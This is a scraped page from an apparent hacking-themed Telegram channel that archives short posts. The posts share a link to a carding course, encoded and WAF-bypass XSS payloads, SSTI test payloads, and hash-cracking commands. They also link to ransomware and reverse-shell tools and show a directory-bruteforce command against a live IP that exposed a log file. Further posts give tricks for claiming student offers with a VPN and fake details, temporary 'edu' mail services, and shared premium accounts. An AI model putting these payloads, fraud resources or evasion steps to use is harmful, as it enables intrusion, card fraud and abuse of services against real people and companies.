Termux All Command [Telegram Group]
رفتن به کانال در Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
نمایش بیشتر1 327
مشترکین
+524 ساعت
+177 روز
+5730 روز
آرشیو پست ها
CARDING course
It’s ban from udemy
But for u ❤️
https://mega.nz/file/ZNxSmbwR#FPncUsWipLhrA6w0W5k7AsQj8zHx2C2lXK8zLaqdkO4
😱 Just found xss
Payload used:
%22%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%74%68%69%73%2e%6f%6e%65%72%72%6f%72%3d%6e%75%6c%6c%3b%61%6c%65%72%74%28%31%29%22%3e
HashRipper is designed for cybersecurity professionals, CTF participants, and ethical hackers who need a fast and efficient way to crack hashed values using dictionary attacks.
Supports over 18 hash algorithms including MD5, SHA1, SHA256, NTLM, SHA3, BLAKE2, RIPEMD160, CRC32, and more
https://lnkd.in/e6n64HRx
hashripper -H 5d41402abc4b2a76b9719d911017c592 -a md5 -w /usr/share/wordlists/rockyou.txt -t 20
hashripper --hashfile /home/kali/Desktop/hash.txt -a sha256 -w /home/kali/Desktop/wordlist.txt -o /home/kali/Desktop/cracked.txt
Bypass XSS WAF protection using invisible separators before or after function name
<img/src/onerror=alert(1337)>
<svg/onload= alert(2)>
🛡 Bug Bounty Tip #1: Hunting for SSTI in the Sign-Up Flow
Server-side template injection during the Sign Up process
🔍 Steps to Test:
1) Navigate to the sign-up page of the target website.
2) Insert common SSTI payloads into fields like First Name, Last Name, and others.
3) Submit the form and check the response or inspect the rendered content.
4) If successful, the result of the expression (e.g., 49 for {{7*7}}) might appear, confirming SSTI.
⚠️ Note: Sometimes, the template engine may only evaluate math or echo variables, rather than execute full code. Always validate carefully
🧪 Sample Payloads to Try:
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
WebExtractor is a powerful OSINT and ethical hacking tool developed in Python. It is used to extract email addresses, phone numbers, and links (both visible and hidden) from a target website
https://github.com/s-r-e-e-r-a-j/WebExtractor
OSINT Tools Iraq
- Open Data portals
- Legal Entities
- Cadastral and other Maps
- Vehicles
- People, phones, social etc.
- Public procurements
- WHOIS
https://lnkd.in/dbJ_rQi7
Mr. Robot - Hacking Tools
- Elpscrk - Mr.Robot Password Generator & Brute Force Program
- https://lnkd.in/ev7V34Av
- fsociety-ransomware-MrRobot
- https://lnkd.in/eqxwr6hC
- fsociety Hacking Tools Pack – A Penetration Testing Framework
- https://lnkd.in/eCprAkiY fsociety
- An advanced memory forensics framework
- https://lnkd.in/erRyi-tj
- rwwwshell: Getting a reverse shell with Mr. Robot ;)
- https://lnkd.in/eda83PTH
- Mr Robot CTF
- https://lnkd.in/eXK2Yg6C
- Block excessive crawlers, bots and spiders traffic on your web site space_invader
- https://lnkd.in/eg6bauq6
- Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ).
- https://lnkd.in/esWRdYZG
- Honey Unix Encryptor (HUE)
- https://lnkd.in/epCM9XQm
- Email-Mr.Robot
- https://lnkd.in/e--9Pn9n
- Mr. Robot's EvilCorp Terminal style for your shell
- https://lnkd.in/eumegz_x
Try with those Temp Edu Mail!
Temp Edu Mail
https://www.imail.edu.vn/
https://etempmail.com/
https://tempumail.com/
https://edumail.icu/
https://tempmail.vn
How to Get Gemini Advanced and 2TB Google Drive storage for Students (FREE for 15 Months)
Steps to Claim:-
1. 𝘊𝘳𝘦𝘢𝘵𝘦 𝘢 𝘯𝘦𝘸 𝘎𝘰𝘰𝘨𝘭𝘦 𝘢𝘤𝘤𝘰𝘶𝘯𝘵 (𝘊𝘰𝘶𝘯𝘵𝘳𝘺 𝘥𝘰𝘦𝘴𝘯'𝘵 𝘮𝘢𝘵𝘵𝘦𝘳)
2. 𝘚𝘪𝘨𝘯 𝘪𝘯 𝘸𝘪𝘵𝘩 𝘵𝘩𝘦 𝘧𝘳𝘦𝘴𝘩 𝘦𝘮𝘢𝘪𝘭 𝘰𝘯 𝘋𝘶𝘤𝘬𝘋𝘶𝘤𝘬𝘎𝘰 𝘉𝘳𝘰𝘸𝘴𝘦𝘳
3. 𝘊𝘰𝘯𝘯𝘦𝘤𝘵 𝘵𝘰 𝘢 𝘜𝘚𝘈 𝘐𝘗 𝘷𝘪𝘢 𝘝𝘗𝘕
4. 𝘖𝘱𝘦𝘯 𝘵𝘩𝘦 𝘭𝘪𝘯𝘬 𝘪𝘯 𝘋𝘶𝘤𝘬𝘋𝘶𝘤𝘬𝘎𝘰: https://one.google.com/join/ai-student
5. 𝘛𝘢𝘱 𝘰𝘯 "𝘊𝘭𝘢𝘪𝘮 𝘖𝘧𝘧𝘦𝘳"
6. You will be redirected to the play store, just press back and you're done
𝘌𝘯𝘫𝘰𝘺 2𝘛𝘉 𝘰𝘧 𝘎𝘰𝘰𝘨𝘭𝘦 𝘖𝘯𝘦 𝘴𝘵𝘰𝘳𝘢𝘨𝘦 𝘧𝘰𝘳 15 𝘮𝘰𝘯𝘵𝘩𝘴!
𝘞𝘰𝘳𝘬𝘴 𝘰𝘯 𝘣𝘰𝘵𝘩 𝘈𝘯𝘥𝘳𝘰𝘪𝘥 & 𝘪𝘖𝘚.
⚠️ 𝘐𝘮𝘱𝘰𝘳𝘵𝘢𝘯𝘵: 𝘔𝘢𝘬𝘦 𝘴𝘶𝘳𝘦 𝘵𝘰 𝘤𝘰𝘯𝘯𝘦𝘤𝘵 𝘵𝘩𝘦 𝘝𝘗𝘕 𝘢𝘧𝘵𝘦𝘳 𝘭𝘰𝘨𝘨𝘪𝘯𝘨 𝘪𝘯𝘵𝘰 𝘺𝘰𝘶𝘳 𝘯𝘦𝘸 𝘢𝘤𝘤𝘰𝘶𝘯𝘵
Get ChatGPT and Canva Premium Account.
1. Go to https://www.oxaam.com and create your account.
(No need for verification, fill in fake info)
2. At the top you will see two options: "Chat GPT" and "Canva"
3. Select ChatGPT, and you will get an email and password, and now use it for login
(If you ask for an OTP, you will get inbox Url on the same page [OTP at top])
Note: These are public accounts don't share your personal info
It will work? Depends on your luck 🤡
#collected
Get ChatGPT and Canva Premium Account.
1. Go to https://www.oxaam.com and create your account.
(No need for verification, fill in fake info)
2. At the top you will see two options: "Chat GPT" and "Canva"
3. Select ChatGPT, and you will get an email and password, and now use it for login
(If you ask for an OTP, you will get inbox Url on the same page [OTP at top])
Note: These are public accounts don't share your personal info
It will work? Depends on your luck 🤡
#collected
After New Installing kali Linux:
sudo apt update && sudo apt full-upgrade -y && sudo apt autoremove -y && sudo apt clean && lsb_release -a
- Text to YouTube video => Syllaby
- Text to mindmaps => Map This
- Text to infographics => Infography
- Text to Presentation => Gamma
- Text to image => Reve AI
- Text to Ads => Adcreative
- Text to ideas => Virality AI
- Text to Music => Soundraw AI
- Text to 3D => Rendora AI
- Text to text => Claude
- Text to code => Codeium
- Text to Animation => Adobe express
- Text to Data analysis => Julius AI
- Text to ebook => Fastread
You can literally create anything from just your ideas!
IDOR = Easy Bug, Big Bounty
Change IDs
Try GET → POST
Path traversal
Old API versions
GraphQL endpoints
Tools: Burp, Arjun, ParamMiner
Keep it simple. Hunt smart.
💰 👍 Find hidden params in javascript files assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
Found a juicy log.txt file during directory bruteforce!
Ran a quick dirsearch on an IP and hit an exposed log.txt—80MB of potentially sensitive info!
Command used:
dirsearch -u https://202.72.5.130/ -t 50 -x 429,404,502,503,400,500,403,428 -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,py,rb,php,bkp
